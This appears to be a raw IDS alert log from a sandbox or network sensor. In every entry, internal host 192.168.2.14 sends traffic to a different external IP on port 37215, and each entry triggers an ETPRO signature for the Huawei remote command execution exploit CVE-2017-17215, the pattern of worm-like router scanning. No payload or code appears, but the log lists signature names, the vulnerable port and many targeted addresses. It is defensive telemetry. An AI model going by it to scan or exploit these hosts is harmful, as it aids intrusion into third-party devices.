                                                    07/10/24-08:27:07.364210TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3700837215192.168.2.14197.14.235.208
                                                    07/10/24-08:27:10.727335TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3517437215192.168.2.14157.56.250.197
                                                    07/10/24-08:26:18.024076TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3546037215192.168.2.14157.24.130.14
                                                    07/10/24-08:26:59.728995TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4211437215192.168.2.1441.138.140.114
                                                    07/10/24-08:27:13.728066TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4364637215192.168.2.1441.167.160.119
                                                    07/10/24-08:27:14.896210TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4472837215192.168.2.14197.8.227.21
                                                    07/10/24-08:26:36.411416TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5192237215192.168.2.14197.255.230.28
                                                    07/10/24-08:26:11.583025TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4438037215192.168.2.1441.88.93.143
                                                    07/10/24-08:26:43.800437TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3377237215192.168.2.14197.182.251.142
                                                    07/10/24-08:26:33.173734TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5894237215192.168.2.14154.96.131.192
                                                    07/10/24-08:26:59.860909TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3802837215192.168.2.14157.145.66.22
                                                    07/10/24-08:26:52.070871TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5942837215192.168.2.14197.79.9.165
                                                    07/10/24-08:26:13.672163TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5668237215192.168.2.14197.201.240.242
                                                    07/10/24-08:26:13.850182TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4180837215192.168.2.14197.106.236.18
                                                    07/10/24-08:26:14.809030TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3513037215192.168.2.14157.236.84.65
                                                    07/10/24-08:27:14.821863TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3315237215192.168.2.14197.140.161.75
                                                    07/10/24-08:27:33.850737TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5702637215192.168.2.14157.108.172.132
                                                    07/10/24-08:26:34.225931TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3398237215192.168.2.14157.213.71.139
                                                    07/10/24-08:27:05.179057TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5358437215192.168.2.14197.6.36.205
                                                    07/10/24-08:26:25.447222TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4896237215192.168.2.14197.146.131.101
                                                    07/10/24-08:26:59.881196TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3618837215192.168.2.14157.95.155.169
                                                    07/10/24-08:26:11.220716TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4393437215192.168.2.1490.7.62.50
                                                    07/10/24-08:27:08.417840TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4781437215192.168.2.14197.144.191.228
                                                    07/10/24-08:26:17.990619TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5509037215192.168.2.14197.10.0.134
                                                    07/10/24-08:27:05.230940TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5135037215192.168.2.14115.56.54.60
                                                    07/10/24-08:27:13.998046TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4379237215192.168.2.1441.181.125.124
                                                    07/10/24-08:27:32.595539TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4493237215192.168.2.1441.96.183.187
                                                    07/10/24-08:26:43.815031TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5495837215192.168.2.14157.94.57.205
                                                    07/10/24-08:26:59.657885TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4001237215192.168.2.14197.246.95.51
                                                    07/10/24-08:26:59.610357TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3532837215192.168.2.1419.181.195.19
                                                    07/10/24-08:27:11.550512TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5629837215192.168.2.14197.84.221.106
                                                    07/10/24-08:26:29.768210TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3812037215192.168.2.14157.138.74.251
                                                    07/10/24-08:26:57.627051TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4467837215192.168.2.1441.28.164.207
                                                    07/10/24-08:26:11.533087TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4375637215192.168.2.1498.174.205.229
                                                    07/10/24-08:27:05.189899TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5213237215192.168.2.142.173.118.106
                                                    07/10/24-08:26:34.229279TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5751037215192.168.2.14157.117.249.235
                                                    07/10/24-08:26:57.650241TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4583437215192.168.2.14157.163.183.51
                                                    07/10/24-08:26:43.839334TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5318237215192.168.2.14208.207.110.198
                                                    07/10/24-08:27:34.136895TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4751037215192.168.2.14197.63.183.227
                                                    07/10/24-08:26:22.298468TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5462037215192.168.2.14157.189.9.34
                                                    07/10/24-08:27:05.146612TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5856837215192.168.2.1441.63.97.155
                                                    07/10/24-08:26:41.343465TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4353437215192.168.2.14197.185.230.144
                                                    07/10/24-08:27:10.739922TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3641037215192.168.2.14157.252.140.105
                                                    07/10/24-08:27:10.591175TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4336437215192.168.2.14197.58.66.199
                                                    07/10/24-08:26:15.849437TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5649037215192.168.2.1441.177.164.54
                                                    07/10/24-08:27:02.722958TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4541037215192.168.2.14197.109.16.205
                                                    07/10/24-08:27:34.118547TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4172037215192.168.2.14157.37.98.156
                                                    07/10/24-08:26:52.060029TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3478237215192.168.2.14128.197.46.188
                                                    07/10/24-08:27:05.148385TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4064437215192.168.2.1441.11.213.255
                                                    07/10/24-08:26:20.155412TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3521037215192.168.2.1441.230.146.133
                                                    07/10/24-08:26:33.193965TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5235637215192.168.2.1441.100.81.89
                                                    07/10/24-08:26:41.420052TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4139437215192.168.2.14157.204.77.54
                                                    07/10/24-08:27:30.526140TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5358237215192.168.2.14190.177.25.107
                                                    07/10/24-08:27:33.890908TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4875237215192.168.2.1441.191.210.91
                                                    07/10/24-08:26:17.968756TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5191637215192.168.2.14197.127.254.137
                                                    07/10/24-08:26:43.779854TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5778637215192.168.2.14197.210.175.47
                                                    07/10/24-08:27:13.891282TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4837637215192.168.2.1439.125.115.164
                                                    07/10/24-08:27:23.781687TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5704037215192.168.2.1441.6.252.187
                                                    07/10/24-08:26:47.945197TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4635637215192.168.2.14157.211.72.167
                                                    07/10/24-08:27:03.000855TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4299237215192.168.2.14197.177.202.175
                                                    07/10/24-08:26:17.971584TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4993237215192.168.2.14157.81.216.202
                                                    07/10/24-08:27:19.253246TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4449037215192.168.2.1441.133.179.103
                                                    07/10/24-08:27:05.098210TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4705437215192.168.2.14100.53.48.234
                                                    07/10/24-08:27:07.301453TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5837837215192.168.2.14157.99.247.1
                                                    07/10/24-08:26:57.603262TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5944237215192.168.2.1441.4.246.41
                                                    07/10/24-08:26:14.803775TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5969037215192.168.2.14197.36.239.34
                                                    07/10/24-08:27:30.520394TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4450237215192.168.2.14157.54.98.92
                                                    07/10/24-08:26:13.659815TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5096637215192.168.2.14197.168.135.189
                                                    07/10/24-08:26:55.325101TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4759837215192.168.2.14197.237.63.137
                                                    07/10/24-08:26:36.373846TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4126637215192.168.2.14157.97.126.174
                                                    07/10/24-08:27:08.397659TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6019837215192.168.2.14151.137.139.187
                                                    07/10/24-08:26:15.857451TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5677437215192.168.2.1441.168.202.81
                                                    07/10/24-08:26:17.976557TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4053037215192.168.2.14197.89.238.78
                                                    07/10/24-08:27:02.922365TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4297437215192.168.2.1441.88.194.190
                                                    07/10/24-08:26:13.828221TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4039437215192.168.2.14157.225.188.176
                                                    07/10/24-08:26:28.903280TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5939637215192.168.2.14197.219.47.186
                                                    07/10/24-08:26:31.088936TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6051437215192.168.2.14157.206.19.156
                                                    07/10/24-08:27:17.063693TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4460437215192.168.2.1441.37.98.106
                                                    07/10/24-08:27:22.797705TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5143237215192.168.2.1441.56.160.172
                                                    07/10/24-08:26:22.260584TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4668237215192.168.2.1441.16.20.87
                                                    07/10/24-08:26:23.322732TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3938637215192.168.2.1441.94.239.224
                                                    07/10/24-08:26:47.990859TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5773037215192.168.2.1441.205.144.27
                                                    07/10/24-08:27:33.881615TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4054637215192.168.2.14106.216.8.201
                                                    07/10/24-08:27:02.958790TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5416637215192.168.2.14213.220.234.211
                                                    07/10/24-08:27:05.146612TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5912837215192.168.2.14157.235.208.253
                                                    07/10/24-08:27:28.148356TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3480037215192.168.2.14197.115.211.165
                                                    07/10/24-08:27:23.968110TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3455037215192.168.2.14157.215.140.7
                                                    07/10/24-08:27:23.888639TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3852437215192.168.2.14197.94.44.32
                                                    07/10/24-08:27:19.309217TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3759237215192.168.2.14197.255.184.32
                                                    07/10/24-08:27:20.425119TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4083837215192.168.2.14110.216.79.246
                                                    07/10/24-08:26:22.221406TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5488237215192.168.2.14197.194.34.31
                                                    07/10/24-08:27:24.883721TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3582837215192.168.2.14197.89.245.174
                                                    07/10/24-08:26:22.301370TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3553237215192.168.2.14157.230.76.4
                                                    07/10/24-08:27:31.485057TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3422837215192.168.2.14222.167.129.42
                                                    07/10/24-08:26:28.841865TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4533637215192.168.2.14190.68.173.0
                                                    07/10/24-08:27:11.556329TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4089237215192.168.2.14197.105.58.241
                                                    07/10/24-08:27:27.155945TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4146437215192.168.2.1441.165.178.91
                                                    07/10/24-08:26:25.462724TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5544437215192.168.2.1441.185.56.144
                                                    07/10/24-08:27:13.889582TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5198237215192.168.2.14157.158.254.38
                                                    07/10/24-08:26:23.332526TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3624837215192.168.2.14197.255.227.65
                                                    07/10/24-08:27:14.836980TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4072837215192.168.2.14157.9.112.82
                                                    07/10/24-08:27:19.302131TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5775037215192.168.2.14157.227.52.23
                                                    07/10/24-08:26:55.401809TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5301437215192.168.2.14150.50.34.170
                                                    07/10/24-08:27:27.051851TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3402437215192.168.2.1441.157.51.102
                                                    07/10/24-08:27:22.476492TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5620837215192.168.2.1441.98.223.82
                                                    07/10/24-08:27:22.573004TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5228637215192.168.2.1441.222.111.145
                                                    07/10/24-08:27:13.828158TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4018037215192.168.2.14157.122.9.199
                                                    07/10/24-08:27:17.107350TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5681837215192.168.2.14197.155.80.247
                                                    07/10/24-08:26:13.842272TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4097637215192.168.2.1490.72.130.32
                                                    07/10/24-08:26:45.632406TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5547237215192.168.2.14157.112.169.0
                                                    07/10/24-08:26:33.245667TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4425837215192.168.2.1441.52.29.15
                                                    07/10/24-08:27:05.154220TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3702837215192.168.2.14125.48.229.203
                                                    07/10/24-08:26:57.646782TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4866637215192.168.2.1499.129.167.10
                                                    07/10/24-08:26:38.525965TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3481437215192.168.2.14157.196.57.74
                                                    07/10/24-08:26:43.813541TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3477437215192.168.2.14157.90.67.48
                                                    07/10/24-08:27:20.418870TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5881437215192.168.2.1441.57.236.8
                                                    07/10/24-08:27:10.647438TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5743837215192.168.2.1441.111.70.244
                                                    07/10/24-08:26:52.035645TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3398637215192.168.2.14197.86.185.112
                                                    07/10/24-08:27:05.242428TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5905437215192.168.2.14197.3.63.253
                                                    07/10/24-08:26:38.569924TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4249037215192.168.2.14218.53.198.84
                                                    07/10/24-08:27:19.334471TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4646437215192.168.2.1441.86.155.49
                                                    07/10/24-08:26:28.830687TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5982437215192.168.2.1441.105.97.173
                                                    07/10/24-08:27:19.274123TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4428837215192.168.2.14197.187.24.6
                                                    07/10/24-08:26:38.585781TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5683037215192.168.2.14223.249.95.21
                                                    07/10/24-08:26:59.881889TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5012237215192.168.2.14200.137.173.39
                                                    07/10/24-08:26:22.290306TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5462437215192.168.2.14157.193.158.208
                                                    07/10/24-08:26:11.131677TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3289637215192.168.2.14221.104.140.125
                                                    07/10/24-08:27:17.084652TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3474837215192.168.2.14197.80.254.31
                                                    07/10/24-08:26:34.242902TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3604437215192.168.2.1436.200.50.55
                                                    07/10/24-08:26:53.247062TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5779237215192.168.2.1441.178.230.15
                                                    07/10/24-08:27:07.349677TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4080037215192.168.2.14197.44.68.14
                                                    07/10/24-08:27:22.903866TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4033637215192.168.2.14157.161.173.202
                                                    07/10/24-08:26:22.273376TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5854837215192.168.2.1441.117.106.174
                                                    07/10/24-08:27:13.990373TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5706237215192.168.2.14197.43.8.190
                                                    07/10/24-08:26:41.500020TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4275437215192.168.2.1418.16.240.89
                                                    07/10/24-08:26:43.667118TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5570837215192.168.2.14157.170.108.185
                                                    07/10/24-08:27:02.931527TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5541237215192.168.2.14197.58.164.119
                                                    07/10/24-08:27:22.532375TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4671637215192.168.2.1441.243.155.214
                                                    07/10/24-08:26:13.845095TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3616037215192.168.2.1441.2.245.226
                                                    07/10/24-08:27:02.756969TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5917037215192.168.2.14157.232.164.194
                                                    07/10/24-08:26:34.239596TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4295037215192.168.2.149.68.179.238
                                                    07/10/24-08:27:14.856517TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5398637215192.168.2.14197.123.223.174
                                                    07/10/24-08:27:22.889193TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3419037215192.168.2.1481.202.92.32
                                                    07/10/24-08:26:52.077860TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5983037215192.168.2.1441.88.248.183
                                                    07/10/24-08:27:05.104096TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5521637215192.168.2.14157.62.86.107
                                                    07/10/24-08:27:02.931527TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3781237215192.168.2.14157.184.17.209
                                                    07/10/24-08:27:07.376255TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4537037215192.168.2.14157.227.101.14
                                                    07/10/24-08:27:07.351373TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4259037215192.168.2.1441.225.167.185
                                                    07/10/24-08:26:38.565170TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4652037215192.168.2.1441.254.247.179
                                                    07/10/24-08:27:31.548799TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5348637215192.168.2.1490.234.122.199
                                                    07/10/24-08:26:20.127957TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3726037215192.168.2.14119.197.173.100
                                                    07/10/24-08:26:55.449292TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5838037215192.168.2.1441.3.115.251
                                                    07/10/24-08:27:17.008672TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4786437215192.168.2.14157.188.119.64
                                                    07/10/24-08:26:53.135908TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4757437215192.168.2.14197.14.133.83
                                                    07/10/24-08:26:28.935220TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3783637215192.168.2.1441.191.105.102
                                                    07/10/24-08:27:30.510800TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5642637215192.168.2.14185.2.56.118
                                                    07/10/24-08:26:57.666585TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4312037215192.168.2.14197.35.197.96
                                                    07/10/24-08:26:59.623766TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4212037215192.168.2.1441.42.141.113
                                                    07/10/24-08:26:11.105153TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6078437215192.168.2.14157.241.125.74
                                                    07/10/24-08:26:11.544307TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4889237215192.168.2.1441.3.38.86
                                                    07/10/24-08:26:26.556847TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5273437215192.168.2.1441.91.126.224
                                                    07/10/24-08:26:41.482995TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5696837215192.168.2.14157.112.171.108
                                                    07/10/24-08:27:22.919171TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4330037215192.168.2.1441.177.62.68
                                                    07/10/24-08:27:07.286969TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5355637215192.168.2.14197.50.205.236
                                                    07/10/24-08:26:36.422822TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5489037215192.168.2.1441.193.87.38
                                                    07/10/24-08:26:47.746309TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4833637215192.168.2.14197.200.192.97
                                                    07/10/24-08:26:13.722263TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4396837215192.168.2.1441.224.17.93
                                                    07/10/24-08:26:59.640486TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3866837215192.168.2.1441.20.77.153
                                                    07/10/24-08:27:13.816832TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5912437215192.168.2.14197.192.41.115
                                                    07/10/24-08:27:30.527827TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4994637215192.168.2.14157.20.45.72
                                                    07/10/24-08:26:13.798574TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4171637215192.168.2.1451.98.106.225
                                                    07/10/24-08:27:31.459997TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3576037215192.168.2.14197.123.200.98
                                                    07/10/24-08:26:15.875137TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5158037215192.168.2.1441.140.163.130
                                                    07/10/24-08:27:05.200422TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4836437215192.168.2.1441.244.24.12
                                                    07/10/24-08:26:49.844556TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5910237215192.168.2.14126.64.91.145
                                                    07/10/24-08:26:14.771167TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5469437215192.168.2.14157.253.171.76
                                                    07/10/24-08:26:52.095655TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5365437215192.168.2.14164.19.249.253
                                                    07/10/24-08:27:08.393293TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6059437215192.168.2.1441.83.170.199
                                                    07/10/24-08:26:59.835498TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4716837215192.168.2.14197.248.82.18
                                                    07/10/24-08:26:26.435270TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4037037215192.168.2.14197.153.191.254
                                                    07/10/24-08:26:26.605487TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5166837215192.168.2.14157.10.169.181
                                                    07/10/24-08:26:11.588620TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4826037215192.168.2.1459.245.135.106
                                                    07/10/24-08:26:17.928888TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5970637215192.168.2.14197.246.41.160
                                                    07/10/24-08:26:57.667245TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5840037215192.168.2.14197.166.161.88
                                                    07/10/24-08:27:02.923335TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4827237215192.168.2.14157.155.105.248
